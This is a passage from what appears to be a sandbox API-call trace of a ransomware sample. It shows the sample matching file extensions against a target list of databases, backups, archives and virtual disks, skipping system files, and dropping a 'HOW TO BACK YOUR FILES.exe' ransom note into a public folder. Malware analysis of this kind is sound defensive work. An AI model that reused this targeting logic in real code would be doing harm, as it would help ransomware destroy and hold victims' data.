(lpString="xml") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="xml") returned -1 [0039.837] lstrlenW (lpString="$er") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="$er") returned 1 [0039.837] lstrlenW (lpString="4dd") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="4dd") returned 1 [0039.837] lstrlenW (lpString="4dl") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="4dl") returned 1 [0039.837] lstrlenW (lpString="^^^") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="^^^") returned 1 [0039.837] lstrlenW (lpString="abs") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="abs") returned 1 [0039.837] lstrlenW (lpString="abx") returned 3 [0039.837] lstrcmpiW (lpString1="wtv", lpString2="abx") returned 1 [0039.837] lstrlenW (lpString="accdb") returned 5 [0039.837] lstrcmpiW (lpString1="w.wtv", lpString2="accdb") returned 1 [0039.837] lstrlenW (lpString="accdc") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accdc") returned 1 [0039.838] lstrlenW (lpString="accde") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accde") returned 1 [0039.838] lstrlenW (lpString="accdr") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accdr") returned 1 [0039.838] lstrlenW (lpString="accdt") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accdt") returned 1 [0039.838] lstrlenW (lpString="accdw") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accdw") returned 1 [0039.838] lstrlenW (lpString="accft") returned 5 [0039.838] lstrcmpiW (lpString1="w.wtv", lpString2="accft") returned 1 [0039.838] lstrlenW (lpString="adb") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="adb") returned 1 [0039.838] lstrlenW (lpString="adb") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="adb") returned 1 [0039.838] lstrlenW (lpString="ade") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="ade") returned 1 [0039.838] lstrlenW (lpString="adf") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="adf") returned 1 [0039.838] lstrlenW (lpString="adn") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="adn") returned 1 [0039.838] lstrlenW (lpString="adp") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="adp") returned 1 [0039.838] lstrlenW (lpString="alf") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="alf") returned 1 [0039.838] lstrlenW (lpString="ask") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="ask") returned 1 [0039.838] lstrlenW (lpString="btr") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="btr") returned 1 [0039.838] lstrlenW (lpString="cat") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="cat") returned 1 [0039.838] lstrlenW (lpString="cdb") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="cdb") returned 1 [0039.838] lstrlenW (lpString="ckp") returned 3 [0039.838] lstrcmpiW (lpString1="wtv", lpString2="ckp") returned 1 [0039.838] lstrlenW (lpString="cma") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="cma") returned 1 [0039.839] lstrlenW (lpString="cpd") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="cpd") returned 1 [0039.839] lstrlenW (lpString="dacpac") returned 6 [0039.839] lstrcmpiW (lpString1="aw.wtv", lpString2="dacpac") returned -1 [0039.839] lstrlenW (lpString="dad") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dad") returned 1 [0039.839] lstrlenW (lpString="dadiagrams") returned 10 [0039.839] lstrcmpiW (lpString1="rt_raw.wtv", lpString2="dadiagrams") returned 1 [0039.839] lstrlenW (lpString="daschema") returned 8 [0039.839] lstrcmpiW (lpString1="_raw.wtv", lpString2="daschema") returned -1 [0039.839] lstrlenW (lpString="db-journal") returned 10 [0039.839] lstrcmpiW (lpString1="rt_raw.wtv", lpString2="db-journal") returned 1 [0039.839] lstrlenW (lpString="db-shm") returned 6 [0039.839] lstrcmpiW (lpString1="aw.wtv", lpString2="db-shm") returned -1 [0039.839] lstrlenW (lpString="db-wal") returned 6 [0039.839] lstrcmpiW (lpString1="aw.wtv", lpString2="db-wal") returned -1 [0039.839] lstrlenW (lpString="dbc") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dbc") returned 1 [0039.839] lstrlenW (lpString="dbs") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dbs") returned 1 [0039.839] lstrlenW (lpString="dbt") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dbt") returned 1 [0039.839] lstrlenW (lpString="dbv") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dbv") returned 1 [0039.839] lstrlenW (lpString="dbx") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dbx") returned 1 [0039.839] lstrlenW (lpString="dcb") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dcb") returned 1 [0039.839] lstrlenW (lpString="dct") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dct") returned 1 [0039.839] lstrlenW (lpString="dcx") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="dcx") returned 1 [0039.839] lstrlenW (lpString="ddl") returned 3 [0039.839] lstrcmpiW (lpString1="wtv", lpString2="ddl") returned 1 [0039.840] lstrlenW (lpString="dlis") returned 4 [0039.840] lstrcmpiW (lpString1=".wtv", lpString2="dlis") returned -1 [0039.840] lstrlenW (lpString="dp1") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="dp1") returned 1 [0039.840] lstrlenW (lpString="dqy") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="dqy") returned 1 [0039.840] lstrlenW (lpString="dsk") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="dsk") returned 1 [0039.840] lstrlenW (lpString="dsn") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="dsn") returned 1 [0039.840] lstrlenW (lpString="dtsx") returned 4 [0039.840] lstrcmpiW (lpString1=".wtv", lpString2="dtsx") returned -1 [0039.840] lstrlenW (lpString="dxl") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="dxl") returned 1 [0039.840] lstrlenW (lpString="eco") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="eco") returned 1 [0039.840] lstrlenW (lpString="ecx") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="ecx") returned 1 [0039.840] lstrlenW (lpString="edb") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="edb") returned 1 [0039.840] lstrlenW (lpString="epim") returned 4 [0039.840] lstrcmpiW (lpString1=".wtv", lpString2="epim") returned -1 [0039.840] lstrlenW (lpString="fcd") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="fcd") returned 1 [0039.840] lstrlenW (lpString="fdb") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="fdb") returned 1 [0039.840] lstrlenW (lpString="fic") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="fic") returned 1 [0039.840] lstrlenW (lpString="flexolibrary") returned 12 [0039.840] lstrcmpiW (lpString1="hort_raw.wtv", lpString2="flexolibrary") returned 1 [0039.840] lstrlenW (lpString="fm5") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="fm5") returned 1 [0039.840] lstrlenW (lpString="fmp") returned 3 [0039.840] lstrcmpiW (lpString1="wtv", lpString2="fmp") returned 1 [0039.840] lstrlenW (lpString="fmp12") returned 5 [0039.840] lstrcmpiW (lpString1="w.wtv", lpString2="fmp12") returned 1 [0039.841] lstrlenW (lpString="fmpsl") returned 5 [0039.841] lstrcmpiW (lpString1="w.wtv", lpString2="fmpsl") returned 1 [0039.841] lstrlenW (lpString="fol") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fol") returned 1 [0039.841] lstrlenW (lpString="fp3") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fp3") returned 1 [0039.841] lstrlenW (lpString="fp4") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fp4") returned 1 [0039.841] lstrlenW (lpString="fp5") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fp5") returned 1 [0039.841] lstrlenW (lpString="fp7") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fp7") returned 1 [0039.841] lstrlenW (lpString="fpt") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="fpt") returned 1 [0039.841] lstrlenW (lpString="frm") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="frm") returned 1 [0039.841] lstrlenW (lpString="gdb") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="gdb") returned 1 [0039.841] lstrlenW (lpString="gdb") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="gdb") returned 1 [0039.841] lstrlenW (lpString="grdb") returned 4 [0039.841] lstrcmpiW (lpString1=".wtv", lpString2="grdb") returned -1 [0039.841] lstrlenW (lpString="gwi") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="gwi") returned 1 [0039.841] lstrlenW (lpString="hdb") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="hdb") returned 1 [0039.841] lstrlenW (lpString="his") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="his") returned 1 [0039.841] lstrlenW (lpString="ib") returned 2 [0039.841] lstrcmpiW (lpString1="tv", lpString2="ib") returned 1 [0039.841] lstrlenW (lpString="idb") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="idb") returned 1 [0039.841] lstrlenW (lpString="ihx") returned 3 [0039.841] lstrcmpiW (lpString1="wtv", lpString2="ihx") returned 1 [0039.841] lstrlenW (lpString="itdb") returned 4 [0039.842] lstrcmpiW (lpString1=".wtv", lpString2="itdb") returned -1 [0039.842] lstrlenW (lpString="itw") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="itw") returned 1 [0039.842] lstrlenW (lpString="jet") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="jet") returned 1 [0039.842] lstrlenW (lpString="jtx") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="jtx") returned 1 [0039.842] lstrlenW (lpString="kdb") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="kdb") returned 1 [0039.842] lstrlenW (lpString="kexi") returned 4 [0039.842] lstrcmpiW (lpString1=".wtv", lpString2="kexi") returned -1 [0039.842] lstrlenW (lpString="kexic") returned 5 [0039.842] lstrcmpiW (lpString1="w.wtv", lpString2="kexic") returned 1 [0039.842] lstrlenW (lpString="kexis") returned 5 [0039.842] lstrcmpiW (lpString1="w.wtv", lpString2="kexis") returned 1 [0039.842] lstrlenW (lpString="lgc") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="lgc") returned 1 [0039.842] lstrlenW (lpString="lwx") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="lwx") returned 1 [0039.842] lstrlenW (lpString="maf") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="maf") returned 1 [0039.842] lstrlenW (lpString="maq") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="maq") returned 1 [0039.842] lstrlenW (lpString="mar") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="mar") returned 1 [0039.842] lstrlenW (lpString="marshal") returned 7 [0039.842] lstrcmpiW (lpString1="raw.wtv", lpString2="marshal") returned 1 [0039.842] lstrlenW (lpString="mas") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="mas") returned 1 [0039.842] lstrlenW (lpString="mav") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="mav") returned 1 [0039.842] lstrlenW (lpString="maw") returned 3 [0039.842] lstrcmpiW (lpString1="wtv", lpString2="maw") returned 1 [0039.842] lstrlenW (lpString="mdbhtml") returned 7 [0039.843] lstrcmpiW (lpString1="raw.wtv", lpString2="mdbhtml") returned 1 [0039.843] lstrlenW (lpString="mdn") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mdn") returned 1 [0039.843] lstrlenW (lpString="mdt") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mdt") returned 1 [0039.843] lstrlenW (lpString="mfd") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mfd") returned 1 [0039.843] lstrlenW (lpString="mpd") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mpd") returned 1 [0039.843] lstrlenW (lpString="mrg") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mrg") returned 1 [0039.843] lstrlenW (lpString="mud") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mud") returned 1 [0039.843] lstrlenW (lpString="mwb") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="mwb") returned 1 [0039.843] lstrlenW (lpString="myd") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="myd") returned 1 [0039.843] lstrlenW (lpString="ndf") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="ndf") returned 1 [0039.843] lstrlenW (lpString="nnt") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="nnt") returned 1 [0039.843] lstrlenW (lpString="nrmlib") returned 6 [0039.843] lstrcmpiW (lpString1="aw.wtv", lpString2="nrmlib") returned -1 [0039.843] lstrlenW (lpString="ns2") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="ns2") returned 1 [0039.843] lstrlenW (lpString="ns3") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="ns3") returned 1 [0039.843] lstrlenW (lpString="ns4") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="ns4") returned 1 [0039.843] lstrlenW (lpString="nsf") returned 3 [0039.843] lstrcmpiW (lpString1="wtv", lpString2="nsf") returned 1 [0039.843] lstrlenW (lpString="nv") returned 2 [0039.843] lstrcmpiW (lpString1="tv", lpString2="nv") returned 1 [0039.843] lstrlenW (lpString="nv2") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="nv2") returned 1 [0039.844] lstrlenW (lpString="nwdb") returned 4 [0039.844] lstrcmpiW (lpString1=".wtv", lpString2="nwdb") returned -1 [0039.844] lstrlenW (lpString="nyf") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="nyf") returned 1 [0039.844] lstrlenW (lpString="odb") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="odb") returned 1 [0039.844] lstrlenW (lpString="odb") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="odb") returned 1 [0039.844] lstrlenW (lpString="oqy") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="oqy") returned 1 [0039.844] lstrlenW (lpString="ora") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="ora") returned 1 [0039.844] lstrlenW (lpString="orx") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="orx") returned 1 [0039.844] lstrlenW (lpString="owc") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="owc") returned 1 [0039.844] lstrlenW (lpString="p96") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="p96") returned 1 [0039.844] lstrlenW (lpString="p97") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="p97") returned 1 [0039.844] lstrlenW (lpString="pan") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="pan") returned 1 [0039.844] lstrlenW (lpString="pdb") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="pdb") returned 1 [0039.844] lstrlenW (lpString="pdm") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="pdm") returned 1 [0039.844] lstrlenW (lpString="pnz") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="pnz") returned 1 [0039.844] lstrlenW (lpString="qry") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="qry") returned 1 [0039.844] lstrlenW (lpString="qvd") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="qvd") returned 1 [0039.844] lstrlenW (lpString="rbf") returned 3 [0039.844] lstrcmpiW (lpString1="wtv", lpString2="rbf") returned 1 [0039.844] lstrlenW (lpString="rctd") returned 4 [0039.845] lstrcmpiW (lpString1=".wtv", lpString2="rctd") returned -1 [0039.845] lstrlenW (lpString="rod") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="rod") returned 1 [0039.845] lstrlenW (lpString="rodx") returned 4 [0039.845] lstrcmpiW (lpString1=".wtv", lpString2="rodx") returned -1 [0039.845] lstrlenW (lpString="rpd") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="rpd") returned 1 [0039.845] lstrlenW (lpString="rsd") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="rsd") returned 1 [0039.845] lstrlenW (lpString="sas7bdat") returned 8 [0039.845] lstrcmpiW (lpString1="_raw.wtv", lpString2="sas7bdat") returned -1 [0039.845] lstrlenW (lpString="sbf") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="sbf") returned 1 [0039.845] lstrlenW (lpString="scx") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="scx") returned 1 [0039.845] lstrlenW (lpString="sdb") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="sdb") returned 1 [0039.845] lstrlenW (lpString="sdc") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="sdc") returned 1 [0039.845] lstrlenW (lpString="sdf") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="sdf") returned 1 [0039.845] lstrlenW (lpString="sis") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="sis") returned 1 [0039.845] lstrlenW (lpString="spq") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="spq") returned 1 [0039.845] lstrlenW (lpString="te") returned 2 [0039.845] lstrcmpiW (lpString1="tv", lpString2="te") returned 1 [0039.845] lstrlenW (lpString="teacher") returned 7 [0039.845] lstrcmpiW (lpString1="raw.wtv", lpString2="teacher") returned -1 [0039.845] lstrlenW (lpString="tmd") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="tmd") returned 1 [0039.845] lstrlenW (lpString="tps") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="tps") returned 1 [0039.845] lstrlenW (lpString="trc") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="trc") returned 1 [0039.845] lstrlenW (lpString="trc") returned 3 [0039.845] lstrcmpiW (lpString1="wtv", lpString2="trc") returned 1 [0039.846] lstrlenW (lpString="trm") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="trm") returned 1 [0039.846] lstrlenW (lpString="udb") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="udb") returned 1 [0039.846] lstrlenW (lpString="udl") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="udl") returned 1 [0039.846] lstrlenW (lpString="usr") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="usr") returned 1 [0039.846] lstrlenW (lpString="v12") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="v12") returned 1 [0039.846] lstrlenW (lpString="vis") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="vis") returned 1 [0039.846] lstrlenW (lpString="vpd") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="vpd") returned 1 [0039.846] lstrlenW (lpString="vvv") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="vvv") returned 1 [0039.846] lstrlenW (lpString="wdb") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="wdb") returned 1 [0039.846] lstrlenW (lpString="wmdb") returned 4 [0039.846] lstrcmpiW (lpString1=".wtv", lpString2="wmdb") returned -1 [0039.846] lstrlenW (lpString="wrk") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="wrk") returned 1 [0039.846] lstrlenW (lpString="xdb") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="xdb") returned -1 [0039.846] lstrlenW (lpString="xld") returned 3 [0039.846] lstrcmpiW (lpString1="wtv", lpString2="xld") returned -1 [0039.846] lstrlenW (lpString="xmlff") returned 5 [0039.846] lstrcmpiW (lpString1="w.wtv", lpString2="xmlff") returned -1 [0039.846] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8a1f1b86, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8a1f1b86, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x940000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win7_scenic-demoshort_raw.wtv", cAlternateFileName="WIN7_S~1.WTV")) returned 0 [0039.846] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0039.846] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d22c8 [0039.846] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Public\\Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0039.847] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0a8 | out: hHeap=0x2b0000) returned 1 [0039.847] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22c0 | out: hHeap=0x2b0000) returned 1 [0039.847] lstrlenW (lpString="C:\\Users\\Public\\Pictures") returned 24 [0039.847] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0039.847] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.847] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.851] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.851] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0a8 [0039.851] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.851] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0039.851] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0039.851] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x496c03c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x496c03c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.851] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.851] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0039.851] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0039.851] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0039.851] FindNextFileW (in: hFindFile=0x2cd0a8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0039.852] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0039.853] lstrlenW (lpString="desktop.ini") returned 11 [0039.853] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\*") returned 26 [0039.853] lstrcpyW (in: lpString1=0x2e2e892, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0039.853] lstrlenW (lpString="desktop.ini") returned 11 [0039.853] lstrlenW (lpString="Ares865") returned 7 [0039.853] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0039.853] lstrlenW (lpString=".dll") returned 4 [0039.853] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0039.853] lstrlenW (lpString=".lnk") returned 4 [0039.853] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0039.853] lstrlenW (lpString=".ini") returned 4 [0039.853] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0039.853] lstrlenW (lpString=".sys") returned 4 [0039.853] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0039.853] lstrlenW (lpString="desktop.ini") returned 11 [0039.853] lstrlenW (lpString="bak") returned 3 [0039.853] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0039.853] lstrlenW (lpString="ba_") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0039.854] lstrlenW (lpString="dbb") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0039.854] lstrlenW (lpString="vmdk") returned 4 [0039.854] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0039.854] lstrlenW (lpString="rar") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0039.854] lstrlenW (lpString="zip") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0039.854] lstrlenW (lpString="tgz") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0039.854] lstrlenW (lpString="vbox") returned 4 [0039.854] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0039.854] lstrlenW (lpString="vdi") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0039.854] lstrlenW (lpString="vhd") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0039.854] lstrlenW (lpString="vhdx") returned 4 [0039.854] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0039.854] lstrlenW (lpString="avhd") returned 4 [0039.854] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0039.854] lstrlenW (lpString="db") returned 2 [0039.854] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0039.854] lstrlenW (lpString="db2") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0039.854] lstrlenW (lpString="db3") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0039.854] lstrlenW (lpString="dbf") returned 3 [0039.854] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0039.854] lstrlenW 